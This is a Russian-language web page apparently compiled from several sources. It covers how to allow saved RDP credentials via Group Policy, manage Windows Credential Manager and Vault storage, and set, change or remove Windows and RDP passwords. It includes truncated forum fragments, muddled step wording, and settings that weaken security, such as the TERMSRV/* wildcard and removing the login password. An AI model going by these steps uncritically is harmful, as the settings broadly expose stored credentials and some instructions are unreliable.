При совершении подключения к удаленному компьютеру есть возможность сохранить пароль от своей учетной записи. Это удобно при частых подключениях и если Вы уверены, что это никак не скажется на безопасности. Однако не исключено, что Вы встретите и вот такое сообщение: Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера, так как его подлинность проверена не полностью. Исправим это досадное недоразумение.
Непосредственно ошибка.
Причина ошибки кроется в том, что по умолчанию сохранение учетных данных запрещено локальной групповой политикой. Для редактирования данной политики нажимаем Пуск → Выполнить и вводим gpedit.msc. Откроется редактор локальных групповых политик.
Нам нужно перейти в ветку Конфигурация компьютера → Административные шаблоны → Система → Передача учетных данных и найти пункт Разрешить делегирование сохраненных учетных данных с проверкой подлинности сервера «только NTLM».
Зайдя в политику, поставьте переключатель в положение Включить и нажмите кнопку Показать возле Добавить серверы в список.
В открывшемся окне надо вручную добавить компьютеры, к которым Вы хотите подключаться с сохранением пароля. Синтаксис имеет следующий вид:
TERMSRV/[имя или адрес удаленного компьютера] — сохраняет учетные данные при подключении к конкретному компьютеру;
TERMSRV/*.domain.com — сохраняет учетные данные при подключении к компьютерам в домене domain.com;
TERMSRV/* — сохраняет учетных данные при любом подключении.
TERMSRV в данном случае должно быть написано именно заглавными буквами. После сохранения внесенных изменений можно форсировать применение новой политики командой gpupdate /force. После этого система начнет запоминать Ваши учетные данные при RDP-подключении.
Доступ к компьютеру по сети без ввода учетных данных
на компе 1 с win7 разшарен диск d. на компе 2 — win8.1. С компа 2 пытаюсь зайти на комп 1 — появляется окно для ввода сетевых учетных данных. В сети есть еще несколько с win7, 8, 10. все заходят без пароля, а ЭТОТ ну ни как. В Центре управления сетями выбрана Частная сеть. В Дополнительных параметрах общего доступа -> Отключить доступ с парольной защитой. В общем вот так.
Рекомендуют также настроить групповые политики, но в этой редакции виндовс групповые политики отсутствуют.
Удаленое доступ к компьютеру в сети
Подскажите пожалуста как подключится к компьютеру соединению в сеть через другой компьютер у.
Доступ к компьютеру локальной сети извне
Здравствуйте. У меня такой вот вопрос: Есть локальная сеть (Ноутбук Windows XP + стационарный.
Как закрыть доступ к компьютеру из локальной сети?
Можно ли разрешить доступ к компьютеру через Интернет, закрыв при этом доступ из локальной сети.
Как открыть полный доступ к компьютеру по локальной сети?
Объясните пожалуйста, почему при открытии “полного” доступа к тому или иному диску, папке всё-равно.
Используем диспетчер учетных данных Windows для хранения паролей
Впервые Credential Manager появился в Windows 7 и позиционируется как достаточное безопасное место для хранения ваших паролей.
В диспетчере учетных данных могут хранится следующие типы аккаунтов:
-
Учетные данные Windows (Windows Credentials)– данные для входа в Windows, для доступа на удаленные компьютеры, сохраненные пароли для RDP подключений, пароли к сайтам, поддерживающих встроенную аутентификацию Windows и т.д;
В Windows Credential не хранятся данные для автоматического входа в Windows или доменные Cached Credentials.
Например, если при доступе к сетевой папке вы включите опцию “Сохранить пароль”, то введенный вами пароли будет сохранен в Credential Manager.
Аналогично пароль для подключения к удаленному RDP/RDS серверу сохраняется в клиенте Remote Desktop Connection (mstsc.exe).
Также в менеджере паролей сохраняются пароли пользователей при их сохранении командой runas /savecred.
Вы можете получить доступ к диспетчеру учетных данных в Windows 10 из классической панели управления (Control PanelUser AccountsCredential Manager, Панель управления -> Учетные записи пользователей -> Диспетчер учетных данных).
Как вы видите, в Credential Manager теперь хранятся два пароля, которые мы сохранили ранее.
Здесь вы можете добавить сохранённый пароль, отредактировать (просмотреть сохраненный пароль из графического интерфейса нельзя) или удалить любую из записей.
Также для работы с сохраненными паролями можно использовать классический диалоговый интерфейс Windows – Stored User Names and Password. Для его вызова, выполните:
Здесь вы также можете управлять сохраненными учетными данными, а также есть функции резервного копирования и восстановления данных в Credential Manager (можно использовать для переноса базы Credential Manager на другой компьютер).
Для управления Credential Manager из командной строки используется утилита vaultcmd . Например, чтобы вывести список сохраненных учетных данных типа Windows Credentials выполните команду:
vaultcmd /listcreds:»Windows Credentials»
Следующая команда удалит из Credential Manager все сохраненные пароли для RDP доступа:
For /F «tokens=1,2 delims= » %G in (‘cmdkey /list ^| findstr «target=TERMSRV»‘) do cmdkey /delete %H
Все сохраненные пароли хранятся в хранилище Windows Vault. Windows Vault это защищенное хранилище секретов, паролей и другой информации пользователя. Данные в Windows Vault структурированы и представляют собой набор записей, принадлежащих определенной схеме Vault. Набор ключей шифрования для записей Windows Vault хранится в файле Policy.vpol.
Для доменных он хранится в каталоге %userprofile%AppDataRoamingMicrosoftVault . Для локальных пользователей в %userprofile%AppDataLocalMicrosoftVault .
Для работы Credential Manager должна быть запущена служба VaultSvc:
Если служба отключена, при попытке получить доступ к Credential Manager появится ошибка
Если вы хотите заблокировать пользователям возможность сохранения сетевых паролей в Credential Manager, нужно включить политику Network access: Do not allow storage of passwords and credentials for network authentication в разделе GPO Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options.
Теперь, если пользователь попытается сохранить пароль в хранилище, появится ошибка:
Как поставить пароль учётной записи Windows 10
Чтобы установить пароль учётной записи Windows 10, нужно:
- Нажать “Пуск” — “Параметры”
- Выбрать пункт “Учетные записи”, а затем — “Параметры входа”
- В разделе “Пароль” нажать “Добавить”
- Ввести пароль и подтвердить действия
Как поменять пароль учётной записи Windows:
- Нажмите “Пуск” — “Параметры”
- Выберите пункт “Учетные записи”, а затем — “Параметры входа”
- В разделе “Пароль” нажмите “Изменить”
- Поменяйте пароль и подтвердите действия, чтбы изменить пароль учётной записи
Как удалить пароль учётной записи:
- Нажмите клавиши Windows + R и введите netplwiz или control userpasswords2 затем нажмите Ок
- Выберите пользователя, для которого нужно удалить пароль и уберите галочку с пункта “Требовать ввод имени пользователя и пароля”
Если кто-то забыл пароль учётной записи Windows 10 (вы или владелец другой учётной записи), то может подойти смена пароля учётной записи через вышеописанный метод от имени администратора.
Если у вас возник вопрос, как сменить пароль на удаленном рабочем столе – ничего удивительного. Причины, побуждающие вас искать ответ, могут быть разными. Например, неудобно запоминать сложную комбинацию, которая была установлена автоматически. Или вы хотите сделать это из соображений безопасности? Сейчас такие запросы возникают все чаще, ведь очень многие перешли на дистанционный формат работы!
Чем вы руководствуетесь – не важно. Важно добиться нужного результата и понять, как поменять пароль на удаленном рабочем столе.
Комбинация клавиш
Есть простой и изящный способ сменить данные для входа – можно воспользоваться комбинацией кнопок на клавиатуре! Все описываемые ниже манипуляции необходимо производить через RDP, на локальном компьютере опция работать не будет.
Итак, как удалить пароль на ПК и поставить новый ключ для входа?
- Одновременно нажмите Ctrl+Alt+End;
- Появится системное меню с нужными параметрами;
- Выбираем из списка «Изменить…».
Появится окно ввода параметров, где уже указано имя учётной записи, для которой вы хотите удалить пароль входа в систему Windows 10 и поставить новый. Готовы?
- Вводим старую комбинацию во вторую строку;
- ниже вписываем новый ключ;
- повторяем придуманный ключ в поле «Подтверждение»;
- жмём на стрелочку справа. Готово!
На экране появится подтверждение того, что комбинация для входа была изменена. Жмите «ОК» и возвращайтесь к работе!
Через файл
Есть альтернативный ответ на вопрос, как изменить пароль на удаленном рабочем столе – немного сложнее, но столь же действенно. Отлично подходит, если работаете в Windows Server 2012, но можно пользоваться и в других ОС.
- Откройте «Блокнот» и создайте новый файл;
- Сохранить его необходимо вручную – наверху ищем кнопку «Сохранить как…»;
- Вбиваем любое имя и вводим расширение .vbs;
- При сохранении в строке «Тип файла» выбираем вариант «Все».
Самое главное! Внутрь файл необходимо вставить следующее (просто скопируйте):
set objShell = CreateObject(«shell.application»)
objshell.WindowsSecurity
Сохранили документ? Теперь просто кликните левой кнопкой мышки дважды, чтобы запустить его исполнение. Автоматически появится системный экран:
- Выберите вариант «Сменить…»;
- Введите старый ключ и дважды повторите новый;
- Нажмите на стрелочку, чтобы удалить пароль входа в Виндовс 10 – с этого момента начинает действовать новая комбинация, придуманная вами.
Файл допустимо хранить в любой директории, пользоваться можно без ограничений.
Windows Server 2016
В этой версии RDP все происходит очень просто – есть специальная функция, достаточно нажать на несколько кнопок.
- Кликните по иконке «Пуск» и перейдите к иконке учётной записи;
- Нажмите на неё, чтобы увидеть дополнительное меню – там есть значок «Изменить параметры…»;
- На панели слева (в открывшемся меню) ищите кнопку «Параметры входа»;
- Вы увидите значок «Изменить….».
Почти все готово! Откроется уже знакомое меню. Сначала нужно ввести старый ключ, потом придумать и вписать новый дважды. Желательно придумать и подсказку, которая будет появляться при входе.
Windows Server 2008
В этой версии RDP смена пароля на удаленном рабочем столе проходит буквально за пару секунд. Сейчас ОС Server 2008 практически не используется, ее давно заменили более современные варианты, но мы расскажем, что нужно делать. На всякий случай!
- Нажмите на кнопку «Пуск»;
- Через открывшееся меню перейдите к разделу «Безопасность Windows»;
- Откроется системное окно настроек, где вы увидите нужный параметр;
- Кликните на кнопку «Сменить»;
- Убедитесь, что указано верное имя пользователя;
- Введите старую комбинацию, а затем новую – и повторите ее для подтверждения;
- Кликните на значок в виде стрелки, чтобы завершить операцию.
Еще раз напомним, этот способ актуален только в Windows Server 2008, в более новых версиях он работать не будет (кнопки «Безопасность» там попросту нет).
Напоследок пара слов о том, как посмотреть пароли от удаленного рабочего стола. Все сохранённые данные можно найти так:
- Нажмите на кнопку меню «Пуск»;
- Перейдите к панели управления и найдите вкладку «Учётные записи пользователей»;
- Найдите вкладку «Дополнительно», где есть раздел «Управление паролями».
Надеемся, вам удалось понять, как узнать пароль от удаленного рабочего стола и изменить его в случае необходимости. Поддерживать безопасность важно, поэтому периодически стоит менять комбинацию для входа. Главное, ее не забывать!